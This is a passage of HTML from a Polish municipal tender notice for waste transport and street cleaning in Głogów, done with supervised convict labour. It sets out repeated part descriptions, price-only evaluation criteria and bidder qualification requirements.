class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90512000-9 - Usługi transportu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Wykonawca będzie prowadził prace w danym sektorze przy pomocy osób skazanych osadzonych w Zakładzie Karnym w Głogowie. Jednocześnie będzie pełnił nadzór nad przydzieloną grupą skazanych lub osób zatrudnionych w ramach prac interwencyjnych. Do obowiązków Wykonawcy będzie należał odbiór skazanych z Zakładu Karnego oraz odwiezienie ich do Zakładu Karnego w Głogowie po zakończeniu pracy. <br/>2. Wykonawca będzie świadczył usługi od godziny 7:00 do godziny 15:00.<br/>Kierowca obowiązany jest do pobrania skazanych z odpowiednią rezerwa czasową tak, aby przystąpić do prac od godziny 7:00. O tej porze skazani powinni być przebrani w ubranie robocze, samochód odpowiednio przygotowany i wyposażony w narzędzia niezbędne do wykonywania prac porządkowych. Zakończenie prac tj. powrót do pomieszczenia socjalnego nastąpi nie wcześniej niż o godzinie 1500.<br/>3.Pracownicy, z ramienia Wykonawcy, przed przystąpieniem do realizacji zamówienia odbędą szkolenie w zakresie dozoru nad skazanymi w Zakładzie Karnym w Głogowie i są zobowiązani przestrzegać przepisy o dozorowaniu skazanych. <br/>4. Nadzorujący zobowiązani są do prowadzenia ewidencji czasu pracy każdego skazanego. Karty pracy zapewni Zamawiający. <br/>Ostatniego dnia każdego miesiąca kierowca złoży wypełnione karty w Urzędzie Miejskim <br/>w Głogowie w Dziale Komunalnym.<br/>5. Zamawiający zapewni narzędzia niezbędne do wykonywania prac. Nadzorujący skazanych zobowiązany jest do dbania o otrzymane narzędzia. W razie kradzieży bądź zguby narzędzi Wykonawca zakupi identyczny sprzęt. <br/>6.Wykonawca będzie wywoził odpady na składowisko komunalne.<br/>7.Wykonawca może wywozić odpady na wysypisko komunalne w czasie godzin pracy .<br/>8. W razie awarii samochodu, Wykonawca zobowiązany jest zapewnić pojazd zastępczy- samochód dostawczy, skrzyniowy, 5 osobowy. Takim pojazdem może świadczyć usługi do końca danego dnia roboczego. Następnego dnia roboczego nie dopuszcza się świadczenia usług autem zastępczym.<br/>9.Wykonawca powinien zapewnić pomieszczenie socjalne, spełniające wszelkie wymogi określone w Rozporządzeniu Ministra Pracy i Polityki socjalnej w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy z dnia 26.09.1997 r. Zamawiający może dopuścić pomieszczenie socjalne do użytku, po uprzedniej akceptacji inspektora ds. BHP Urzędu Miejskiego w Głogowie. Pomieszczenie ma służyć osobom skazanym tylko i wyłącznie do schronienia się przed niekorzystnymi warunkami atmosferycznymi i jako zaplecze socjalne.<br/>10.Przerwę śniadaniową wyznacza się od godziny 10.00 do godziny 10.30. <br/>11. Wykonawca zobowiązany jest do dbania o odzież ochronną którą zapewnia Zamawiający osobom skazanym. Wykonawca ma obowiązek prania ubrań roboczych jeżeli zachodzi taka konieczność, nie rzadziej jednak niż dwa razy w miesiącu. <br/>12. Zamawiający zastrzega sobie prawo wprowadzania zmian w harmonogramie w ramach limitu godzin sprzątania, zmian ulic oraz częstotliwości.<br/>13. W sytuacji niedopuszczenia do pracy grupy skazanych , nie wynikającej z winy Wykonawcy, w celu zapewnienia ciągłości robót Zamawiający skieruje do wykonywania czynności porządkowych pracowników interwencyjnych, wykonujących prace w ramach robót publicznych.<br/>14. Rozliczenie za wykonaną pracę, bez obecności skazanych z Zakładu Karnego ale przy udziale pracowników interwencyjnych, następować będzie w okresach miesięcznych na podstawie faktury VAT i karty pracy samochodu.<br/><br/>Wykonawca do nadzoru nad skazanymi wskaże osoby, które nie były wykluczone przez Zakład Karny z możliwości świadczenia usług na rzecz Gminy Miejskiej Głogów <br/>w w /w zakresie.<br/><br/>Szczegółowy zakres zadania ( załącznik nr 12) oraz wykaz poszczególnych rejonów oraz terenów zielonych określa mapka (załącznik nr 11) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90512000-9 - Usługi transportu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Wykonawca będzie prowadził prace w danym sektorze przy pomocy osób skazanych osadzonych w Zakładzie Karnym w Głogowie. Jednocześnie będzie pełnił nadzór nad przydzieloną grupą skazanych lub osób zatrudnionych w ramach prac interwencyjnych. Do obowiązków Wykonawcy będzie należał odbiór skazanych z Zakładu Karnego oraz odwiezienie ich do Zakładu Karnego w Głogowie po zakończeniu pracy. <br/>2. Wykonawca będzie świadczył usługi od godziny 7:00 do godziny 15:00.<br/>Kierowca obowiązany jest do pobrania skazanych z odpowiednią rezerwa czasową tak, aby przystąpić do prac od godziny 7:00. O tej porze skazani powinni być przebrani w ubranie robocze, samochód odpowiednio przygotowany i wyposażony w narzędzia niezbędne do wykonywania prac porządkowych. Zakończenie prac tj. powrót do pomieszczenia socjalnego nastąpi nie wcześniej niż o godzinie 1500.<br/>3.Pracownicy, z ramienia Wykonawcy, przed przystąpieniem do realizacji zamówienia odbędą szkolenie w zakresie dozoru nad skazanymi w Zakładzie Karnym w Głogowie i są zobowiązani przestrzegać przepisy o dozorowaniu skazanych. <br/>4. Nadzorujący zobowiązani są do prowadzenia ewidencji czasu pracy każdego skazanego. Karty pracy zapewni Zamawiający. <br/>Ostatniego dnia każdego miesiąca kierowca złoży wypełnione karty w Urzędzie Miejskim <br/>w Głogowie w Dziale Komunalnym.<br/>5. Zamawiający zapewni narzędzia niezbędne do wykonywania prac. Nadzorujący skazanych zobowiązany jest do dbania o otrzymane narzędzia. W razie kradzieży bądź zguby narzędzi Wykonawca zakupi identyczny sprzęt. <br/>6.Wykonawca będzie wywoził odpady na składowisko komunalne.<br/>7.Wykonawca może wywozić odpady na wysypisko komunalne w czasie godzin pracy .<br/>8. W razie awarii samochodu, Wykonawca zobowiązany jest zapewnić pojazd zastępczy- samochód dostawczy, skrzyniowy, 5 osobowy. Takim pojazdem może świadczyć usługi do końca danego dnia roboczego. Następnego dnia roboczego nie dopuszcza się świadczenia usług autem zastępczym.<br/>9.Wykonawca powinien zapewnić pomieszczenie socjalne, spełniające wszelkie wymogi określone w Rozporządzeniu Ministra Pracy i Polityki socjalnej w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy z dnia 26.09.1997 r. Zamawiający może dopuścić pomieszczenie socjalne do użytku, po uprzedniej akceptacji inspektora ds. BHP Urzędu Miejskiego w Głogowie. Pomieszczenie ma służyć osobom skazanym tylko i wyłącznie do schronienia się przed niekorzystnymi warunkami atmosferycznymi i jako zaplecze socjalne.<br/>10.Przerwę śniadaniową wyznacza się od godziny 10.00 do godziny 10.30. <br/>11. Wykonawca zobowiązany jest do dbania o odzież ochronną którą zapewnia Zamawiający osobom skazanym. Wykonawca ma obowiązek prania ubrań roboczych jeżeli zachodzi taka konieczność, nie rzadziej jednak niż dwa razy w miesiącu. <br/>12. Zamawiający zastrzega sobie prawo wprowadzania zmian w harmonogramie w ramach limitu godzin sprzątania, zmian ulic oraz częstotliwości.<br/>13. W sytuacji niedopuszczenia do pracy grupy skazanych , nie wynikającej z winy Wykonawcy, w celu zapewnienia ciągłości robót Zamawiający skieruje do wykonywania czynności porządkowych pracowników interwencyjnych, wykonujących prace w ramach robót publicznych.<br/>14. Rozliczenie za wykonaną pracę, bez obecności skazanych z Zakładu Karnego ale przy udziale pracowników interwencyjnych, następować będzie w okresach miesięcznych na podstawie faktury VAT i karty pracy samochodu.<br/><br/>Wykonawca do nadzoru nad skazanymi wskaże osoby, które nie były wykluczone przez Zakład Karny z możliwości świadczenia usług na rzecz Gminy Miejskiej Głogów <br/>w w /w zakresie.<br/><br/>Szczegółowy zakres zadania ( załącznik nr 12) oraz wykaz poszczególnych rejonów oraz terenów zielonych określa mapka (załącznik nr 11) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90512000-9 - Usługi transportu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonawca będzie prowadził prace w danym sektorze przy pomocy osób skazanych osadzonych w Zakładzie Karnym w Głogowie. Jednocześnie będzie pełnił nadzór nad przydzieloną grupą skazanych lub osób zatrudnionych w ramach prac interwencyjnych. Do obowiązków Wykonawcy będzie należał odbiór skazanych z Zakładu Karnego oraz odwiezienie ich do Zakładu Karnego w Głogowie po zakończeniu pracy. <br/>2. Wykonawca będzie świadczył usługi od godziny 7:00 do godziny 15:00.<br/>Kierowca obowiązany jest do pobrania skazanych z odpowiednią rezerwa czasową tak, aby przystąpić do prac od godziny 7:00. O tej porze skazani powinni być przebrani w ubranie robocze, samochód odpowiednio przygotowany i wyposażony w narzędzia niezbędne do wykonywania prac porządkowych. Zakończenie prac tj. powrót do pomieszczenia socjalnego nastąpi nie wcześniej niż o godzinie 1500.<br/>3.Pracownicy, z ramienia Wykonawcy, przed przystąpieniem do realizacji zamówienia odbędą szkolenie w zakresie dozoru nad skazanymi w Zakładzie Karnym w Głogowie i są zobowiązani przestrzegać przepisy o dozorowaniu skazanych. <br/>4. Nadzorujący zobowiązani są do prowadzenia ewidencji czasu pracy każdego skazanego. Karty pracy zapewni Zamawiający. <br/>Ostatniego dnia każdego miesiąca kierowca złoży wypełnione karty w Urzędzie Miejskim <br/>w Głogowie w Dziale Komunalnym.<br/>5. Zamawiający zapewni narzędzia niezbędne do wykonywania prac. Nadzorujący skazanych zobowiązany jest do dbania o otrzymane narzędzia. W razie kradzieży bądź zguby narzędzi Wykonawca zakupi identyczny sprzęt. <br/>6.Wykonawca będzie wywoził odpady na składowisko komunalne.<br/>7.Wykonawca może wywozić odpady na wysypisko komunalne w czasie godzin pracy .<br/>8. W razie awarii samochodu, Wykonawca zobowiązany jest zapewnić pojazd zastępczy- samochód dostawczy, skrzyniowy, 5 osobowy. Takim pojazdem może świadczyć usługi do końca danego dnia roboczego. Następnego dnia roboczego nie dopuszcza się świadczenia usług autem zastępczym.<br/>9.Wykonawca powinien zapewnić pomieszczenie socjalne, spełniające wszelkie wymogi określone w Rozporządzeniu Ministra Pracy i Polityki socjalnej w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy z dnia 26.09.1997 r. Zamawiający może dopuścić pomieszczenie socjalne do użytku, po uprzedniej akceptacji inspektora ds. BHP Urzędu Miejskiego w Głogowie. Pomieszczenie ma służyć osobom skazanym tylko i wyłącznie do schronienia się przed niekorzystnymi warunkami atmosferycznymi i jako zaplecze socjalne.<br/>10.Przerwę śniadaniową wyznacza się od godziny 10.00 do godziny 10.30. <br/>11. Wykonawca zobowiązany jest do dbania o odzież ochronną którą zapewnia Zamawiający osobom skazanym. Wykonawca ma obowiązek prania ubrań roboczych jeżeli zachodzi taka konieczność, nie rzadziej jednak niż dwa razy w miesiącu. <br/>12. Zamawiający zastrzega sobie prawo wprowadzania zmian w harmonogramie w ramach limitu godzin sprzątania, zmian ulic oraz częstotliwości.<br/>13. W sytuacji niedopuszczenia do pracy grupy skazanych , nie wynikającej z winy Wykonawcy, w celu zapewnienia ciągłości robót Zamawiający skieruje do wykonywania czynności porządkowych pracowników interwencyjnych, wykonujących prace w ramach robót publicznych.<br/>14. Rozliczenie za wykonaną pracę, bez obecności skazanych z Zakładu Karnego ale przy udziale pracowników interwencyjnych, następować będzie w okresach miesięcznych na podstawie faktury VAT i karty pracy samochodu.<br/><br/>Wykonawca do nadzoru nad skazanymi wskaże osoby, które nie były wykluczone przez Zakład Karny z możliwości świadczenia usług na rzecz Gminy Miejskiej Głogów <br/>w w /w zakresie.<br/><br/>Szczegółowy zakres zadania ( załącznik nr 12) oraz wykaz poszczególnych rejonów oraz terenów zielonych określa mapka (załącznik nr 11) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90512000-9 - Usługi transportu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Wykonawca będzie prowadził prace w danym sektorze przy pomocy osób skazanych osadzonych w Zakładzie Karnym w Głogowie. Jednocześnie będzie pełnił nadzór nad przydzieloną grupą skazanych lub osób zatrudnionych w ramach prac interwencyjnych. Do obowiązków Wykonawcy będzie należał odbiór skazanych z Zakładu Karnego oraz odwiezienie ich do Zakładu Karnego w Głogowie po zakończeniu pracy. <br/>2. Wykonawca będzie świadczył usługi od godziny 7:00 do godziny 15:00.<br/>Kierowca obowiązany jest do pobrania skazanych z odpowiednią rezerwa czasową tak, aby przystąpić do prac od godziny 7:00. O tej porze skazani powinni być przebrani w ubranie robocze, samochód odpowiednio przygotowany i wyposażony w narzędzia niezbędne do wykonywania prac porządkowych. Zakończenie prac tj. powrót do pomieszczenia socjalnego nastąpi nie wcześniej niż o godzinie 1500.<br/>3.Pracownicy, z ramienia Wykonawcy, przed przystąpieniem do realizacji zamówienia odbędą szkolenie w zakresie dozoru nad skazanymi w Zakładzie Karnym w Głogowie i są zobowiązani przestrzegać przepisy o dozorowaniu skazanych. <br/>4. Nadzorujący zobowiązani są do prowadzenia ewidencji czasu pracy każdego skazanego. Karty pracy zapewni Zamawiający. <br/>Ostatniego dnia każdego miesiąca kierowca złoży wypełnione karty w Urzędzie Miejskim <br/>w Głogowie w Dziale Komunalnym.<br/>5. Zamawiający zapewni narzędzia niezbędne do wykonywania prac. Nadzorujący skazanych zobowiązany jest do dbania o otrzymane narzędzia. W razie kradzieży bądź zguby narzędzi Wykonawca zakupi identyczny sprzęt. <br/>6.Wykonawca będzie wywoził odpady na składowisko komunalne.<br/>7.Wykonawca może wywozić odpady na wysypisko komunalne w czasie godzin pracy .<br/>8. W razie awarii samochodu, Wykonawca zobowiązany jest zapewnić pojazd zastępczy- samochód dostawczy, skrzyniowy, 5 osobowy. Takim pojazdem może świadczyć usługi do końca danego dnia roboczego. Następnego dnia roboczego nie dopuszcza się świadczenia usług autem zastępczym.<br/>9.Wykonawca powinien zapewnić pomieszczenie socjalne, spełniające wszelkie wymogi określone w Rozporządzeniu Ministra Pracy i Polityki socjalnej w sprawie ogólnych przepisów bezpieczeństwa i higieny pracy z dnia 26.09.1997 r. Zamawiający może dopuścić pomieszczenie socjalne do użytku, po uprzedniej akceptacji inspektora ds. BHP Urzędu Miejskiego w Głogowie. Pomieszczenie ma służyć osobom skazanym tylko i wyłącznie do schronienia się przed niekorzystnymi warunkami atmosferycznymi i jako zaplecze socjalne.<br/>10.Przerwę śniadaniową wyznacza się od godziny 10.00 do godziny 10.30. <br/>11. Wykonawca zobowiązany jest do dbania o odzież ochronną którą zapewnia Zamawiający osobom skazanym. Wykonawca ma obowiązek prania ubrań roboczych jeżeli zachodzi taka konieczność, nie rzadziej jednak niż dwa razy w miesiącu. <br/>12. Zamawiający zastrzega sobie prawo wprowadzania zmian w harmonogramie w ramach limitu godzin sprzątania, zmian ulic oraz częstotliwości.<br/>13. W sytuacji niedopuszczenia do pracy grupy skazanych , nie wynikającej z winy Wykonawcy, w celu zapewnienia ciągłości robót Zamawiający skieruje do wykonywania czynności porządkowych pracowników interwencyjnych, wykonujących prace w ramach robót publicznych.<br/>14. Rozliczenie za wykonaną pracę, bez obecności skazanych z Zakładu Karnego ale przy udziale pracowników interwencyjnych, następować będzie w okresach miesięcznych na podstawie faktury VAT i karty pracy samochodu.<br/><br/>Wykonawca do nadzoru nad skazanymi wskaże osoby, które nie były wykluczone przez Zakład Karny z możliwości świadczenia usług na rzecz Gminy Miejskiej Głogów <br/>w w /w zakresie.<br/><br/>Szczegółowy zakres zadania ( załącznik nr 12) oraz wykaz poszczególnych rejonów oraz terenów zielonych określa mapka (załącznik nr 11) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90512000-9 - Usługi transportu odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w postępowaniu, dotyczące:<br/>1) sytuacji ekonomicznej i finansowej; <br/>Dla części : od I, II, III, IV, V, VI:<br/>a) posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 20.000,00zł: co potwierdzą poprzez złożenie aktualnej informacji banku,<br/>b) posiadają ubezpieczenie od OC z tytułu prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia, na kwotę co najmniej 80.000,00 złotych<br/>UWAGA:<br/>Do każdej części zamówienia należy wykazać środki finansowe lub zdolność kredytową odpowiadającą ilości części na którą Wykonawca składa ofertę.<br/><br/>2) zdolności technicznej lub zawodowej, tj. <br/>Dla części: od I, II, III, IV, V, VI:<br/>a)	posiadają doświadczenie umożliwiające realizację zamówienia tzn. w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonali usługę lub usługi polegające na wynajmie aut wraz z obsługą i nadzorem nad grupą osób wykonujących prace porządkowe na łączną kwotę co najmniej 40.000 zł <br/><br/>b)	dysponują lub będą dysponować potencjałem technicznym, tj.: posiadają lub dysponują samochodem o następujących parametrach technicznych:<br/>	DMC do 3,5 t<br/>	dostawczy, skrzyniowy, <br/>	ładowność: min. 1300 kg<br/>	ilość miejsc: min. 5<br/>	możliwość podwyższenia burt bocznych<br/>	wymiary skrzyni: dł. min 290 cm, szer. min 195 cm <br/>	rok produkcji: nie starszy niż 2004<br/>	typu wywrotka<br/>Samochód będzie służył do przewozu osób skazanych i wywozu nieczystości. <br/><br/>UWAGA:<br/>W przypadku składania oferty na części zamówienia I, II, III, IV, V, VI, Wykonawca musi posiadać lub dysponować co najmniej jednym autem na każdą z części, na którą składa ofertę.<br/> <br/>b) Zdolność zawodowa:<br/> Wykonawca musi dysponować odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia i w tym względzie: <br/><br/>	dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj. <br/>-	osoba posiadająca prawo jazdy kat. B <br/><br/>UWAGA:<br/>Do każdej części zamówienia należy wykazać 1 osobę, odpowiedzialną za realizację zadania tj. liczba osób musi odpowiadać <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający żąda następujących podmiotowych środków dowodowych :<br/>a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, wystawionych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b)	oświadczenia o braku przynależności do grupy kapitałowej ( wzór stanowi załącznik Nr 3 do SWZ ). Zamawiający żąda od wykonawcy, który na potwierdzenie spełniania warunków udziału w postępowaniu, polega na zdolnościach lub sytuacji innych podmiotów, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt. 1 ppkt. 1 lit. a) i b).<br/>c)	oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu , o którym mowa w art.125 ustawy Prawo zamówień publicznych ( wzór stanowi załącznik Nr 8 do SWZ ).<br/>2)	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">wykazu wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączenie dowodów określających czy te usługi zostały wykonane lub <br/>są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, <br/>a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest <br/>w stanie uzyskać tych dokumentów - oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków <br/>o dopuszczenie do udziału w postępowaniu ( wzór stanowi załącznik Nr 4 do SWZ ),<br/>b)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami ( wzór stanowi załącznik Nr 5 do SWZ),<br/>c)	Wykaz pojazdów dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi urządzeniami ( wzór stanowi załącznik Nr 5 do SWZ),<br/>d)	informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem,<br/>e)	dokument potwierdzający, że wykonawca jest ubezpieczony od OC w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej ubezpieczenia.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Formularz ofertowy (wzór określa załącznik Nr 1 do SWZ). <br/>2)	Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu (wzór określa załącznik Nr 2 do SWZ) <br/>Pełnomocnictwo - gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy.<br/>Zobowiązanie podmiotu (jeżeli dotyczy) (wzór określa załącznik Nr 7 do SWZ).<br/>Wadium <br/>6) Zastrzeżenie tajemnicy 